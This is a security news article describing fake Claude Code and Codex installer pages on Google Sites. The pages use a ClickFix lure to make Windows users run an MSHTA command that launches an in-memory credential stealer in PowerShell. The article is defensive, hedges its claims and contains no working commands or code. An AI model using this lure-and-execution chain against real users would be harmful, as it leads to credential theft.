When a Fake Installer Becomes the Attack: How Developer Trust Is Being Turned Against Itself

The most effective phishing page does not look criminal. It looks useful. In this case, a fake installer themed around Claude Code and other AI developer tools rode on Google Sites hosting and a ClickFix-style flow designed to make the user do the dangerous part themselves: launch a command on Windows.

Fast Facts

• Fake Claude Code installers have been linked to Google Sites pages.
• The lure imitates developer tools such as Claude Code and Codex.
• The interaction reportedly leads users to run an MSHTA-based command.
• The payload is described as fileless and credential-stealing, with an in-memory stealer staged inside PowerShell.exe.
• No confirmed victim count, named threat actor, or verified breach is established in the available information.

What makes this chain dangerous

Claude Code is a terminal-based coding assistant, which matters because the audience for this lure is already comfortable with installers, commands, and scripts. That familiarity creates a narrow but valuable trust window. A page hosted on a familiar platform can further lower suspicion, especially when it looks like routine setup guidance rather than an obvious phishing kit.

The ClickFix pattern takes advantage of that behavior. Microsoft has described this technique as a social-engineering play that convinces users to copy, paste, or run commands under the guise of a fix, verification step, or access check. The attacker does not need to smash through a perimeter if the victim is persuaded to execute the first command voluntarily.

MITRE ATT&CK tracks mshta.exe abuse as a living-off-the-land pattern under System Binary Proxy Execution. That matters because built-in Windows utilities can blend into normal activity and may be less suspicious than an unfamiliar dropped executable. In the reported chain, the MSHTA step is used as part of the handoff toward PowerShell.exe, where the stealer is said to run in memory.

At this stage, the safest reading is technical, not sensational. The available information supports a risk analysis, not a definitive claim that every target lost credentials or that any specific organization suffered a confirmed breach.

Why defenders should care

This is a reminder that “trusted” is not the same as “safe.” A legitimate hosting surface can be abused as credibility, and a familiar developer workflow can become the lure. From a defensive perspective, the highest-value controls are not only web filtering, but also command-line visibility, application control, and user training that treats any page asking for a pasted command as high risk.

Teams should watch for suspicious parent-child chains involving a browser, mshta.exe, and PowerShell. They should also verify AI tool installers and update commands through official vendor documentation rather than promotional pages or ad hoc setup instructions. If a login prompt, installer, or verification step depends on a copy-pasted command, the burden of proof should shift to the page, not the user.

Conclusion

The broader lesson is blunt: modern phishing does not always try to steal a click. Sometimes it tries to borrow your judgment. The moment a page asks you to execute code in the name of convenience, the threat is no longer the website alone - it is your own terminal.

WIKICROOK

• ClickFix: A social-engineering technique that nudges users into running malicious commands by presenting them as fixes or verification steps.
• Fileless malware: Malware that runs primarily in memory, leaving little or no obvious file on disk.
• mshta.exe: A built-in Windows utility that can be abused to execute remote or local content through proxy execution.
• PowerShell.exe: A Windows scripting and automation environment often targeted for payload staging and command execution.
• Living-off-the-land binary: A legitimate system tool abused by attackers to blend malicious actions into normal administration.